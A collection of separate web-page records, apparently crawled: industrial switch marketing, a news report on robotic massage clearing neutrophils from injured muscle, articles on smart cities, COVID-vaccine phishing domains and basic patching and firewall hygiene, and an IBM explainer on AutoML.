Traditionally, serial protocol is the preferred communication method used in Industrial Automation applications; Ethernet was not accepted by large vendors with proprietary protocols, which prevented the wide acceptance of Ethernet on the factory floor until the early 90s New generation equipment utilizes new IP protocols devised for the control industry. As manufacturing facilities install new equipment, utilizing IP protocols they also need new Ethernet based networking infrastructure.
The industrial control environment is harsh compared to computer rooms and offices. Networking equipment and systems must be able to withstand high levels of electrical noise, dust, dirt, humidity and extreme hot and cold temperature levels. In order to run the plant twenty-four hours a day, 365 days a year, factory floor controllers must access data embedded in drive systems, operator workstations and I/O devices, on a real time basis. For example, terminating the fill operation on a bottle requires much more time sensitive communications than accessing the next page of an Internet site.
Automation control applications require accuracy of data transmission rather than bandwidth for large packet size. Any packet loss might mess up the operation flow or lead to an unaffordable result. EtherWAN’s “α-Ring topology” provides network redundancy to guarantee network availability and reliability. Once connections are in problem, the network system can be recovered less than 15ms. The same efficiency is proved when 130+ switches are connected. The solution is to install the EX94005 (5-port unmanaged switch) in the robotic machine. Each control or assembly station may have multiple EX94005 unmanaged switches in line. All are then connecting with the EX73000 (16-port Hardened Management Switch) to form a redundant Ethernet Ring environment. The EX77000 (24-port Hardened Managed Switch), located in the centralized control room of the industrial zone, is also connected with EX73000 switches in the field. This will allow administrators monitor the production flow and take proper actions when demand calls.
EtherWAN's products are designed for hardened and heavy duty applications suitable for the extreme environments found in industrial automation applications. EtherWAN’s series of Ethernet switches have UL1604/ ISA 12.12.01 safety certifications for Hazardous environments and proprietary technology α-ring to ensure that the data communications needs for real-time applications are met, as well as the ability to monitor them to arrange more flexible production demands. As a result of using EtherWAN’s switches, the overall downtime rate is decreased, helping users to attain maximum availability and minimum day-to-day maintenance. | <urn:uuid:db556be7-5f99-4487-9710-46302e667357> | CC-MAIN-2022-40 | https://www.asmag.com/showpost/24907.aspx | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337524.47/warc/CC-MAIN-20221004184523-20221004214523-00602.warc.gz | en | 0.910342 | 629 | 2.984375 | 3 |
But other than making people feel good, do these “mechanotherapies” actually improve healing after severe injury?
According to a new study from researchers at Harvard’s Wyss Institute for Biologically Inspired Engineering and John A. Paulson School of Engineering and Applied Sciences (SEAS), the answer is “yes.”
Using a custom-designed robotic system to deliver consistent and tunable compressive forces to mice’s leg muscles, the team found that this mechanical loading (ML) rapidly clears immune cells called neutrophils out of severely injured muscle tissue.
This process also removed inflammatory cytokines released by neutrophils from the muscles, enhancing the process of muscle fiber regeneration. The research is published in Science Translational Medicine.
“Lots of people have been trying to study the beneficial effects of massage and other mechanotherapies on the body, but up to this point it hadn’t been done in a systematic, reproducible way. Our work shows a very clear connection between mechanical stimulation and immune function.
This has promise for regenerating a wide variety of tissues including bone, tendon, hair, and skin, and can also be used in patients with diseases that prevent the use of drug-based interventions,” said first author Bo Ri Seo, Ph.D., who is a Postdoctoral Fellow in the lab of Core Faculty member Dave Mooney, Ph.D. at the Wyss Institute and SEAS.
A more meticulous massage gun
Seo and her coauthors started exploring the effects of mechanotherapy on injured tissues in mice several years ago, and found that it doubled the rate of muscle regeneration and reduced tissue scarring over the course of two weeks. Excited by the idea that mechanical stimulation alone can foster regeneration and enhance muscle function, the team decided to probe more deeply into exactly how that process worked in the body, and to figure out what parameters would maximize healing.
They teamed up with soft robotics experts in the Harvard Biodesign Lab, led by Wyss Associate Faculty member Conor Walsh, Ph.D., to create a small device that used sensors and actuators to monitor and control the force applied to the limb of a mouse.
The device we created allows us to precisely control parameters like the amount and frequency of force applied, enabling a much more systematic approach to understanding tissue healing than would be possible with a manual approach,” said co-second author Christopher Payne, Ph.D., a former Postdoctoral Fellow at the Wyss Institute and the Harvard Biodesign Lab who is now a Robotics Engineer at Viam, Inc.
Once the device was ready, the team experimented with applying force to mice’s leg muscles via a soft silicone tip and used ultrasound to get a look at what happened to the tissue in response. They observed that the muscles experienced a strain of between 10-40%, confirming that the tissues were experiencing mechanical force.
They also used those ultrasound imaging data to develop and validate a computational model that could predict the amount of tissue strain under different loading forces.
They then applied consistent, repeated force to injured muscles for 14 days. While both treated and untreated muscles displayed a reduction in the amount of damaged muscle fibers, the reduction was more pronounced and the cross-sectional area of the fibers was larger in the treated muscle, indicating that treatment had led to greater repair and strength recovery.
The greater the force applied during treatment, the stronger the injured muscles became, confirming that mechanotherapy improves muscle recovery after injury. But how?
Evicting neutrophils to enhance regeneration
To answer that question, the scientists performed a detailed biological assessment, analyzing a wide range of inflammation-related factors called cytokines and chemokines in untreated vs. treated muscles. A subset of cytokines was dramatically lower in treated muscles after three days of mechanotherapy, and these cytokines are associated with the movement of immune cells called neutrophils, which play many roles in the inflammation process.
Treated muscles also had fewer neutrophils in their tissue than untreated muscles, suggesting that the reduction in cytokines that attract them had caused the decrease in neutrophil infiltration.
The team had a hunch that the force applied to the muscle by the mechanotherapy effectively squeezed the neutrophils and cytokines out of the injured tissue. They confirmed this theory by injecting fluorescent molecules into the muscles and observing that the movement of the molecules was more significant with force application, supporting the idea that it helped to flush out the muscle tissue.
To pick apart what effect the neutrophils and their associated cytokines have on regenerating muscle fibers, the scientists performed in vitro studies in which they grew muscle progenitor cells (MPCs) in a medium in which neutrophils had previously been grown.
They found that the number of MPCs increased, but the rate at which they differentiated (developed into other cell types) decreased, suggesting that neutrophil-secreted factors stimulate the growth of muscle cells, but the prolonged presence of those factors impairs the production of new muscle fibers.
“Neutrophils are known to kill and clear out pathogens and damaged tissue, but in this study we identified their direct impacts on muscle progenitor cell behaviors,” said co-second author Stephanie McNamara, a former Post-Graduate Fellow at the Wyss Institute who is now an M.D.-Ph.D. student at Harvard Medical School (HMS).
“While the inflammatory response is important for regeneration in the initial stages of healing, it is equally important that inflammation is quickly resolved to enable the regenerative processes to run its full course.”
Seo and her colleagues then turned back to their in vivo model and analyzed the types of muscle fibers in the treated vs. untreated mice 14 days after injury. They found that type IIX fibers were prevalent in healthy muscle and treated muscle, but untreated injured muscle contained smaller numbers of type IIX fibers and increased numbers of type IIA fibers. This difference explained the enlarged fiber size and greater force production of treated muscles, as IIX fibers produce more force than IIA fibers.
Finally, the team homed in on the optimal amount of time for neutrophil presence in injured muscle by depleting neutrophils in the mice on the third day after injury. The treated mice’s muscles showed larger fiber size and greater strength recovery than those in untreated mice, confirming that while neutrophils are necessary in the earliest stages of injury recovery, getting them out of the injury site early leads to improved muscle regeneration.
“These findings are remarkable because they indicate that we can influence the function of the body’s immune system in a drug-free, non-invasive way,” said Walsh, who is also the Paul A. Maeder Professor of Engineering and Applied Science at SEAS and whose group is experienced in developing wearable technology for diagnosing and treating disease. “This provides great motivation for the development of external, mechanical interventions to help accelerate and improve muscle and tissue healing that have the potential to be rapidly translated to the clinic.”
The team is continuing to investigate this line of research with multiple projects in the lab. They plan to validate this mechanotherpeutic approach in larger animals, with the goal of being able to test its efficacy on humans. They also hope to test it on different types of injuries, age-related muscle loss, and muscle performance enhancement.
“The fields of mechanotherapy and immunotherapy rarely interact with each other, but this work is a testament to how crucial it is to consider both physical and biological elements when studying and working to improve human health,” said Mooney, who is the corresponding author of the paper and the Robert P. Pinkas Family Professor of Bioengineering at SEAS.
“The idea that mechanics influence cell and tissue function was ridiculed until the last few decades, and while scientists have made great strides in establishing acceptance of this fact, we still know very little about how that process actually works at the organ level.
This research has revealed a previously unknown type of interplay between mechanobiology and immunology that is critical for muscle tissue healing, in addition to describing a new form of mechanotherapy that potentially could be as potent as chemical or gene therapies, but much simpler and less invasive,” said Wyss Founding Director Don Ingber, M.D., Ph.D., who is also the Judah Folkman Professor of Vascular Biology at (HMS) and the Vascular Biology Program at Boston Children’s Hospital, as well as Professor of Bioengineering at SEAS.
ACUTE RESPONSE OF NEUTROPHILS TO EXERCISE
If inflammation is regarded as the proliferation of WBCs after soft tissue injury, then the cellular inflammatory response actually begins at the onset of exercise, when the circulating level of neutrophils increases significantly. 5–8 Neutrophils are the first WBC population to arrive and affect the host inflammatory response during exercise and soft tissue injury ( Table).
These cells have both specific and nonspecific defensive mechanisms, some of which are capable of causing additional tissue damage. 15–18 In the past, the early effects of damaging eccentric exercise were proposed to result in increased numbers of circulating neutrophils, as these cells would be required to enter the injury site to initiate phagocytosis or removal of damaged tissues.
However, this immediate response has also been observed after both noninjurious passive stretching and isometric exercise, illustrating that the presence of neutrophils does not necessarily always lead to injury. 19
The mechanism for early neutrophilia postexercise is likely due to a combination of factors. During rest, more than half of the circulating neutrophils are marginated along the endothelial walls of blood vessels. At the onset of exercise, increases in epinephrine, blood flow, and cell-signaling molecules demarginate these neutrophils away from the vessel walls, resulting in their mobilization into the circulation. 5, 20, 21 Demargination allows the neutrophils to enter the circulation and redistribute elsewhere in the body, as needed. The mechanisms by which neutrophils localize in damaged or stressed tissue are just beginning to be understood and may represent key strategies for intervention to limit certain aspects of inflammation.
The movement of a neutrophil from the circulation into the tissue, called diapedesis, is under tight regulatory control of the underlying tissue. In skeletal muscle, diapedesis can occur rapidly during exercise. 22 Neutrophil recruitment is ultimately the responsibility of the muscle fibers (myocytes) together with mast cells from a variety of tissues, including the local connective tissue. If a myocyte is perturbed in some fashion, such as in the case of an active stretch or contusion, it communicates with the endothelial wall of the adjacent blood vessel, initiating a cascade of signaling events and resulting in diapedesis. This intercellular communication is accomplished, in part, by a series of cell-signaling molecules, or cytokines, that are essential to any understanding of immune cell function.
The term cytokine is derived from the Greek root meaning “to put cells into motion.” 17 All nucleated cells in the body produce cytokines and similarly express cytokine receptors on their surface membranes. Cytokines act at the surface of the target cells, principally to alter cell function. 23
Skeletal muscle continually produces cytokines in an effort to maintain homeostasis and to regulate function. Simple perturbations of skeletal muscle, such as an active stretch during eccentric exercise, markedly increase the expression of interleukin-1β (IL-1β) and tumor necrosis factor–α (TNF-α). 24
These proinflammatory cytokines upregulate the expression of endothelial-leukocyte adhesion molecules (E-selectin) within the endothelium of the adjacent blood vessels. 17, 25, 26 Activation of the endothelium is site specific and can result in the release of additional IL-1β, as well as additional proinflammatory cytokines, including IL-6 and IL-8, both of which have been shown to attract neutrophils. 27–31
Thus, endothelial activation serves 2 purposes: encouraging the adhesion of neutrophils at the site of cell stress (margination) and assisting the cell in recruiting additional neutrophils ( Figure 1).
The temporary adhesion of neutrophils to the endothelium results in their immobilization and, hence, prolonged signaling from the muscle cell. 32 Without margination, no effective communication would be possible between the myocytes and the neutrophils, because these cell types would not be in close proximity for an adequate length of time.
This cytokine-mediated communication results in a reorganization of neutrophil 33, 34 and endothelial 35, 36 cell structure, allowing the neutrophils to pass from the endothelium (diapedesis) to the extracellular matrix (ECM) adjacent to the myocytes.
The traditional thinking has been that these cytokines were released only by injured or damaged myocytes, resulting in the localization of neutrophils to these injured tissues. This finding has been observed after eccentric contractions 4, 37 and has led to speculation that inflammation is the process responsible for delayed-onset muscle soreness. 19, 20, 38
However, simple muscle activation and passive stretch have recently been shown to be sufficient stimuli for diapedesis to occur, with subsequent localization of neutrophils within the ECM of skeletal muscle. 39, 40 Currently, researchers are focused on the mechanisms for neutrophil recruitment and the function of these neutrophils in otherwise healthy, uninjured muscle.
Among the most important questions regarding neutrophils and inflammation is whether the localization of neutrophils in the ECM facilitates healing or tissue destruction. Evidence is beginning to indicate that it is more likely a combination of both repair and further damage. The latter seems somewhat surprising but may even be an important signal for tissue repair.
Historically, the acute management of athletic musculoskeletal injury has focused on limiting the cardinal signs of inflammation in an effort to expedite the rehabilitative process and to facilitate an early return to competition. 81 To this end, the use of ice, compression, and elevation for initial management of injuries has flourished.
Over the last 25 years, rationales for acute treatment practices have changed, focusing on retarding secondary injury in an effort to minimize total injury. 82, 83 Regardless of the rationale, the practice of using ice, compression, and elevation in managing acute inflammation is well ingrained. Although a potential role for the use of physical agents, such as cryotherapy, in attenuating the neutrophilic response has been demonstrated in the laboratory, 84, 85 the actual clinical evidence supporting the efficacy of these practices is limited.
Similarly, limiting inflammation and enhancing tissue repair through the suppression of neutrophil recruitment and activation may reduce tissue damage postexercise. Such efforts have been established, as nonsteroidal inflammatory drugs (NSAIDs) have been used for centuries in an attempt to limit the inflammatory response. However, the anti-inflammatory effects may be confounded by the analgesic action of these drugs, 86 which has long been the focus of early interventions for muscle injury. 81
It has been suggested that the magnitude of pain after tissue trauma corresponds to the concentration of WBCs within the injured tissue. 87 However, this theory has not been supported in the literature. For example, although tendinitis is a common diagnosis, the absence of WBCs in tissues affected by this condition indicates that this is not a true inflammatory response. 88
Conversely, the mere presence of WBCs does not always coincide with the cardinal signs of inflammation. White blood cells have been observed in the absence of obvious tissue trauma, 39 even though this situation is generally not referred to as an inflammatory process.
A challenge to reducing inflammation through pharmacologic intervention is the multiple cellular pathways by which the inflammatory response can be mediated. Traditional NSAIDs block the cyclooxygenase (COX) pathway that contributes to cell-mediated prostaglandin (PGE 2) production 89 and, arguably, neutrophil recruitment. 90 However, other proinflammatory pathways exist for the cell to recruit neutrophils to damaged or exercised muscle, including the alternative lipoxygenase pathway 91 and the nuclear factor kappa-B (NF-κB)–mediated induction of proinflammatory genes. 92
Although a great deal of information on the efficacy of NSAID use exists in the literature, the immediate and long-term use of NSAIDs to control inflammation remains controversial. This may be due to the multiple proinflammatory pathways, the wide variety of emerging NSAIDs designed to target specific cellular pathways, and their respective effects of muscle repair and regeneration.
The effects of NSAIDs on inflammatory cell accumulation in the muscle and their relationship with muscle repair remain controversial. 44 For instance, inhibition of NF-κB by curcumin has been shown to accelerate muscle regeneration. 93 Although non–NF-κB inhibitors such as the NSAID naproxen have been shown to have no effect on muscle cell regeneration, 94 NS-398 (a COX-2–specific inhibitor) reduced neutrophil and macrophage entry into the muscle, delayed regeneration and healing, and resulted in increased TGF-β1 and increased tissue fibrosis. 89
Evidence is accumulating that NSAIDs may actually interfere with satellite cell proliferation, differentiation, and fusion 89, 95 and, therefore, may adversely affect muscle regeneration and repair. 89, 96, 97 Similarly, inhibited tissue repair after NSAID administration has also been shown after injury in other soft tissues, including ligaments. 98 Ultimately, although NSAID treatment for soft tissue injuries is common in sports medicine settings, no concrete evidence demonstrates that such treatments are justified, even for the analgesic effects. 99
If it is beneficial to limit the neutrophilic response, then the timing and dosage of NSAIDs are likely important. Neutrophils are the dominant immune cells for the first 4 to 24 hours postinjury, after which macrophages predominate. 3 Some potential clearly exists for limiting the neutrophil-mediated damage that appears to accompany mechanical stress to muscle and other tissues.
However, whether more is to be gained by combating the secondary neutrophilic damage but potentially interfering with the muscle regeneration process or by accepting the secondary damage in hopes that faster regeneration is stimulated remains unclear. It is important to note that evidence of impeding regeneration 75 was observed in neutrophil-depleted mice. That is, regeneration was impaired in an animal model in which no neutrophils were present, indicating that neutrophils may play a key role in muscle repair.
Although this laboratory model is useful, it does not reflect the clinical reality of acute intervention in the injured athlete. Completely abolishing the neutrophilic response using typical clinical cryotherapy or NSAID therapy would be practically impossible. Therefore, we expect that some level of neutrophilic response would be seen, regardless of our acute intervention. No data presently describe whether a partially muted response would be beneficial or harmful.
In skeletal muscle, the propensity for an enhanced inflammatory response and fibroblast proliferation exceeds the muscle’s ability to regenerate, particularly in humans, resulting in the formation of a fibrotic scar. Until recently, this fibrotic response was presumed to be a necessary step in the formation of nascent myotubes for muscle fiber repair.
However, fibrotic scar formation is not an optimal outcome and may be due to excessive cell signaling 100 and inflammatory response. 101 When the function of fibroblasts and TGF-β1 was inhibited after laceration injuries, skeletal muscle had the inherent ability to regenerate damaged fibers. 102–104 Although this finding has not been studied in models of severe strain injury, the manipulation of cell signaling may provide a glimpse into the possible future of therapeutic agents designed to modify tissue healing.
Clinically, return to activity can result in an exacerbation of the inflammatory response. 105 However, evidence is also accumulating that regular exercise acts as an anti-inflammatory agent. 106 Neutrophil function and cytotoxicity may be modified through exercise, 107 and these modifications may depend on exercise intensity. 21 The production of cytokines by neutrophils as well as the resulting response from all WBCs can be modified with long-term exercise. 15
The exact mechanisms are not known, but the low-level inflammatory response produced through regular exercise may blunt the cells’ response to cytokines or inhibit their production and subsequent release. In this regard, regular exercise may suppress the release of proinflammatory cytokines, such as TNF-α. 106 Recently, using isolated chondrocytes, the proinflammatory response was shown to vary depending on the magnitude of the mechanical signal applied to the tissue. 108 Thus, exercise may produce both proinflammatory and anti-inflammatory effects, depending on the magnitude of the stimulus and the corresponding level of cytokine released.
More information: Skeletal muscle regeneration with robotic actuation–mediated clearance of neutrophils, Science Translational Medicine (2021). www.science.org/doi/10.1126/scitranslmed.abe8868 | <urn:uuid:4fd09676-0542-4d40-9c03-9dd24bfd3175> | CC-MAIN-2022-40 | https://debuglies.com/2021/10/08/massage-quickly-removes-neutrophils-from-severely-injured-muscle-tissue-and-makes-them-heal-faster-and-stronger/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338073.68/warc/CC-MAIN-20221007112411-20221007142411-00602.warc.gz | en | 0.949954 | 4,418 | 2.796875 | 3 |
Whether you are a tech enthusiast or a casual tech fan, one thing is certain: you have heard about the Internet of things on at least one occasion. If anything, it would be more surprising if you have not considered that the Internet of things is now making waves.
In simple terms, the idea behind the Internet of things is connecting any device that can be turned on and off to the Internet or a certain network. This means that related gadgets, devices, and appliances can be connected and programmed in such a way that will improve efficiency. For the individual, this could mean a better-kept household, a more efficient way of doing chores, and better communication among members of the same household. For cities, the Internet of things spells accessibility and efficiency, giving way to the rise of smart cities.
How the Internet of things can Help in Creating Smarter Cities
To put it simply, a smart city is a city wherein information, and communication technologies are incorporated into various aspects of life, particularly public services, to improve the city’s functions and the quality of life of people in it. The ultimate goal in creating smart cities is increasing efficiency and livability to maximize resources and minimize waste and operating costs.
There are various ways in which the Internet of things can be used to create smarter cities. Since the Internet of things can be used in programming and remotely control any device connected to the internet or a network, the possibilities are virtually limitless. The Internet of things can be used to improve various aspects of city life, ranging from enhanced public services to accelerated emergency response.
The internet of things can be used to enhance public services in various ways. For example, it can be used to create parking availability apps which can aid in alleviating traffic problems, especially in busy areas. It can also create push notifications for city-wide announcements, detect water leaks, and even determine health or transport eligibility.
Effective public transport management is also one good application of the internet of things. The usual pitfall of transportation systems is the lack of coordination between different modes of public transportation. The internet of things attempts to solve this problem by providing means by which different modes of public transportation may compensate for delays and shortcomings of one another. This presents commuters with several travel alternatives. In addition, the internet of things can also be used in the predictive maintenance of transport systems, thereby further reducing the likelihood of mishaps and delays.
Finally, the internet of things is also useful in terms of accelerated emergency response. Through real-time data collection, information across various devices can be analyzed instantly, allowing quicker responses to emergencies. This is especially helpful in the case of medical emergencies wherein doctors at the destination hospital could give instructions and receive patient data to allow for quicker treatment upon the patient’s arrival at the destination hospital.
Of course, using the internet of things to create smarter cities also comes with its own disadvantages, albeit the disadvantages are typically related to logistics and resources. To effectively convert a city into a smart city, the internet network throughout the city must be well-established. The city’s infrastructure must also undergo a couple of changes and modifications to accommodate internet connectivity and other network programming functions.
Despite the upfront costs associated with creating smarter cities, the final result is certainly well worth the investment. After all, not only do smart cities provide a safer, more efficient, and more livable community for residents, but they also help in addressing environmental concerns.
Smarter Cities for Healthier Environment
In addition to being highly efficient, smart cities are also environment-friendly. In the same way that sensors can be used in operating streetlights and managing transportation systems, the internet of things can also create more environment-friendly cities. Here are some of how using the internet of things can be smarter for the environment:
It lays the groundwork for fewer emissions.
One of the greatest advantages of employing the internet of things in creating smarter cities is that it greatly improves transportation. With several public modes of transportation available and more efficient ride-sharing options, individuals are less incentivized to drive their own cars, thereby lowering emissions. In addition, a more efficient transport system also lessens the number of vehicles on the streets, making major thoroughfares more bike-friendly.
It is more energy- and resource-efficient.
Employing the internet of things in creating smarter cities means automating routine processes. This significantly lowers processing time and allows for optimizing processes to conserve energy. Connecting related services to one network allows for proper scheduling of maintenance, check-ups, and operation times, thereby allowing operators to determine when certain services or devices can be turned off without affecting the delivery of public services.
In addition, the importance of using sensors in creating smarter cities greatly contributes to maximizing energy use. By using automated doors in major establishments, for example, indoor climate can better be maintained, thereby preventing centralized cooling systems from overworking and consuming too much energy. Using sensors to ensure that resources are only turned on when needed is another advantage of the internet of things. For example, using touchless faucets in public bathrooms will allow the city to save on water consumption. The same also goes for detecting leaks in water pipes that would otherwise go unnoticed. Sensors are also especially useful in the case of streetlights since instead of keeping streetlights on, they can remain off until movement is detected in the immediate vicinity.
It allows for real-time monitoring of living conditions.
Finally, sensors and cameras installed in smart cities allow for regular monitoring of environmental conditions, ranging from pollution levels, air quality, noise levels, temperature, and even traffic. By collecting such data, the city council can easily identify areas that need more attention and enact policies that will help in addressing environmental problems early on. Regular monitoring of living conditions also allows the city council to see how efficient environment-related processes, such as garbage collection and waste disposal.
The internet of things has certainly changed how we do things. On a larger scale, as in the case of cities, using the internet of things to optimize processes can help improve efficiency and take care of the environment. By allowing for regular monitoring of living conditions and real-time data analysis, the internet of things can give the city council the information they need to nip environmental problems in the bud and come up with solutions that can be implemented effectively even with limited resources. Thus, the internet of things is essential in making smart cities more efficient and helping alleviate environmental problems that inevitably arise in metropolitan areas. | <urn:uuid:5be15491-db5e-47f8-86da-75dd0b05c853> | CC-MAIN-2022-40 | https://equivio.com/creating-smarter-cities-with-internet-of-things/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334591.19/warc/CC-MAIN-20220925162915-20220925192915-00002.warc.gz | en | 0.92871 | 1,313 | 3.40625 | 3 |
The topic of COVID-19 vaccines has drawn much attention, including in the cybersecurity sector. Spikes in domain registration activity, detected recently, hint a probable increase in phishing attacks.
When various countries started their vaccination campaigns in 2020, purchases of domains with the word “vaccine” sharply peaked.
The trend was first noticed back in August 2020, when the Typosquatting Data Feed saw dozens of Sputnik-related domain names shortly after Russia’s announcement about the new Sputnik vaccine.
Similarly, the number of domains featuring the word “vaccine” increased by almost 100% in the month after the first Pfizer COVID-19 vaccine was administered to a patient.
Webroot, an American cybersecurity software company, observed that from December 8 through January 6, 94.8% more domain names with “vaccine” in them were registered compared with the previous month.
Within last year, over 12,000 domains related to the COVID-19 vaccine were registered. Many are bought for legit reasons but many of them need to be treated with caution.
Other terms used in the domain names included vaccination, vaccinate, covid, coronavirus, freezer, clinic, trial, tracker, and certificate. Sixty-four percent of those domains were registered under the .com top-level domain. This may be an indication that the bad actors want to target mostly commercial domains.
In fact, some of the vaccine-related domains have already been reported on VirusTotal for suspicious activities like phishing. For example, this group of domains bulk-registered in August, 2020:
So what does all this tell us?
Due to increased interest in coronavirus-related topics, people more often visit such websites for information, for services, etc. Such vaccine-related domains should be visited with double care as they may present phishing and other threats. | <urn:uuid:8dfc693d-8150-4d15-a3b8-5d7f86adf885> | CC-MAIN-2022-40 | https://cyberintelmag.com/cloud-security/security-concerns-about-outburst-of-covid-19-vaccine-related-domain-names/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334974.57/warc/CC-MAIN-20220927002241-20220927032241-00002.warc.gz | en | 0.954258 | 433 | 2.71875 | 3 |
Did you know that the most common way cybercriminals get into a network is through loopholes in popular software, applications, and programs?
Despite how advanced modern software is, it is still designed by humans, and the fact is that humans make mistakes. Due to this, much of the software you rely on to get work done every day could have flaws — or “exploits” — that leave you vulnerable to security breaches.
Many of the most common malware and viruses used by cybercriminals today are based on exploiting those programming flaws; to address this, developers regularly release software patches and updates to fix those flaws and protect the users.
This is why it’s imperative that you keep your applications and systems up to date – everything from your firewalls to your antivirus software needs to be kept up to date.
Why? Check out this video to learn more about patching, firewalls, and antivirus software:
Unfortunately, most users find updates to be tedious and time-consuming and often opt to just click “Remind Me Later” instead of sitting through an often-inconvenient update process.
If your systems are not patched, that’s like leaving all of your sensitive documents in an unlocked car accessible to anyone willing to check if the door is open.
You can install patches manually, via a regularly scheduled task. Or you can set up your systems to automatically install patches whenever the manufacturer releases them.
Another tool for protecting your network is the use of anti-virus software, which continuously scans your systems looking for malicious programs such as a virus or worm.
You also need to make sure you have a viable firewall in place. A firewall is a set of rules that block or allow connections to your environment. Firewalls shield your computer or network from malicious or unnecessary network traffic.
By regularly patching your software, using anti-virus software, and using a firewall, you now have multiple layers of protection. This doesn’t mean your computers will be safe from every type of threat, but it is a solid starting point in enhancing your cybersecurity. | <urn:uuid:1acf8607-95e2-42c4-8798-df1e1b0b7dd1> | CC-MAIN-2022-40 | https://www.kraftgrp.com/patching-firewalls-anti-virus-software/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334974.57/warc/CC-MAIN-20220927002241-20220927032241-00002.warc.gz | en | 0.940488 | 436 | 3.125 | 3 |
What is AutoML?
Automated Machine Learning (AutoML) has become a trending topic in industry and academic artificial intelligence (AI) research in recent years. AutoML shows great promise in providing solutions for AI in regulated industries in providing explainable and reproducible results. AutoML allows for greater access to AI development for those without the theoretical background currently needed for role in data science.
Every step in the current prototypical data science pipeline, such as data preprocessing, feature engineering, and hyperparameter optimization, has to be done manually by machine learning experts. By comparison, adopting AutoML allows a simpler development process by which a few lines of code can generate the code necessary to begin developing a machine learning model.
One can think of AutoML - regardless of whether building classifiers or training regressions - as a generalized search concept, with specialized search algorithms for finding the optimal solutions for each component piece of the ML pipeline. In building a system that allows for the automation of just three key pieces of automation – feature engineering, hyperparameter optimization, and neural architecture search – AutoML promises a future where democratized machine learning is a reality.
Types of AutoML
In a data science pipeline, there are many steps a data science team must go through to build a predictive model. Even experienced teams of data scientists and ML engineers can benefit from the increased speed and transparency that comes with AutoML. A data scientist has to start with a hypothesis, gather the correct dataset, try some data visualization, engineer extra features to harness all signal available, train a model with hyperparameters (link resides outside IBM), and for state-of-the-art deep learning they have to design the optimal architecture for a Deep Neural Network - hopefully on a GPU if available to them.
Automated Feature Engineering
A data feature is a part of the input data to a machine learning model, and feature engineering refers to the transformative process where a data scientist derives new information from existing data. Feature engineering is one of the key value-adding processes in an ML workflow, and good features are the difference between a model with acceptable performance and a brilliantly performant model. These mathematical transformations of raw data are read into the model, and serve as the heart of the machine learning process. Automated feature engineering (PDF 1.7 MB) (AFE) (link resides outside IBM) is the process of exploring the space of the viable combinations of features in an mechanistic – rather than manual – fashion.
Manual feature engineering is a modern-day alchemy that comes at a great cost in terms of time: building a single feature can often take hours, and the number of features required for a bare minimum accuracy score, let alone a production-level accuracy baseline, can number into the hundreds. By automating the exploration of a feature space, AutoML reduces the time a data science team spends in this phase from days to minutes.
Reducing the hours of manual intervention by a data scientist is not the only benefit for automated feature engineering. Generated features are often clearly interpretable. In strictly regulated industries such as healthcare or finance, that explainability (link resides outside IBM) is important because it lowers barriers to adopting AI via interpretability. Additionally, a data scientist or analyst benefits from the clarity of these features because they make the high-quality models more compelling and actionable. Automatedly generated features also have the potential to find new KPIs for an organization to monitor and act upon. Once a data scientist has completed feature engineering, they then have to optimize their models with strategic feature selection.
Automated Hyperparameter Optimization
Hyperparameters are a part of machine learning algorithms best understood by analogy as levers for fine-tuning model performance – though often incremental adjustments have outsize impact. In small scale data science modeling, hyperparameters can easily be set by hand and optimized by trial and error.
For deep learning applications, the number of hyperparameters grows exponentially which puts their optimization beyond the abilities of a data science team to accomplish in a manual and timely fashion. Automated hyperparameter optimization (HPO) (link resides outside IBM) relieves teams of the intensive responsibility to explore and optimize across the full event space for hyperparameters and instead allows teams to iterate and experiment over features and models.
Another strength of automating the machine learning process is that now data scientists can focus on the why of model creation rather than the how. Considering the extremely large amounts of data available to many enterprises and the overwhelming number of questions that can be answered with this data, an analytics team can pay attention to which aspects of the model they should optimize for, such as the classic problem of minimizing false negatives in medical testing.
Neural Architecture Search (NAS)
The most complex and time-consuming process in deep learning is the creation of the neural architecture. Data science teams spend long amounts of time selecting the appropriate layers and learning rates that in the end are often only for the weights in the model, as in many language models. Neural architecture search (NAS) (link resides outside IBM) has been described as “using neural nets to design neural nets” and is one of the most obvious areas of ML to benefit from automation.
NAS searches begin with a choice of which architectures to try. The outcome of NAS is determined by the metric against which each architecture is judged. There are several common algorithms to use in a neural architecture search. If the potential number of architectures is small, choices for testing can be made at random. Gradient-based approaches, whereby the discrete search space is turned into a continuous representation, have shown to be very effective. Data science teams can also try evolutionary algorithms in which architectures are evaluated at random, and changes are applied slowly, propagating child architectures that are more successful while pruning those that are not.
Neural architecture searches are one of the key elements of AutoML that promise to democratize AI. These searches, however, often come with a very high carbon footprint. An examination of these tradeoffs has not been done yet, and optimization for ecological cost is an ongoing search area in NAS approaches.
Strategies to Use AutoML
Automated Machine Learning sounds like a panacea of technical solutionism that an organization can use to replace expensive data scientists, but in reality using it requires intelligent strategies for an organization. Data scientists fill essential roles to design experiments, translate results into business outcomes, and maintain the full lifecycle of their machine learning models. So how can cross-functional teams make use of AutoML to optimize their use of time and shorten time to realizing value from their models?
The optimal workflow for including AutoML APIs is one that uses it to parallelize workloads and shorten time spent on manually intensive tasks. Instead of spending days on hyperparameter tuning, a data scientist could instead automate this process on multiple types of models concurrently, and then subsequently test which was most performant.
Additionally, there are AutoML features that enable team members of different skill levels to now contribute to the data science pipeline. A data analyst without Python expertise could leverage a toolkit, like AutoAI on IBM Watson® Studio, to train a predictive model using the data they’re able to extract on their own via query. Using AutoML, a data analyst can now preprocess data, build a machine learning pipeline, and produce a fully trained model they can use for validating their own hypotheses without requiring a full data science team’s attention.
AutoML and IBM AutoAI
IBM researchers and developers contribute to the growth and development of AutoML. Ongoing product development with AutoAI on IBM Watson and the work of the IBM Researchers on Lale (link resides outside IBM), an open-source automated data science library, are just some of the ways that IBM helps to create the next generation of AI approaches. While Lale is an open source project, it is actually core to many of AutoAI’s capabilities.
For data science teams who work with Python as the core of their ML stack, Lale offers a semi-automated library that integrates seamlessly within scikit-learn (link resides outside IBM) pipelines - different than auto-sklearn (link resides outside IBM), or a library like TPOT (link resides outside IBM). Lale goes beyond scikit-learn with automation, correctness checks, and interoperability. While based in the scikit-learn paradigm, it has increasing numbers of transformers and operators from other Python libraries and from libraries in languages such as Java and R.
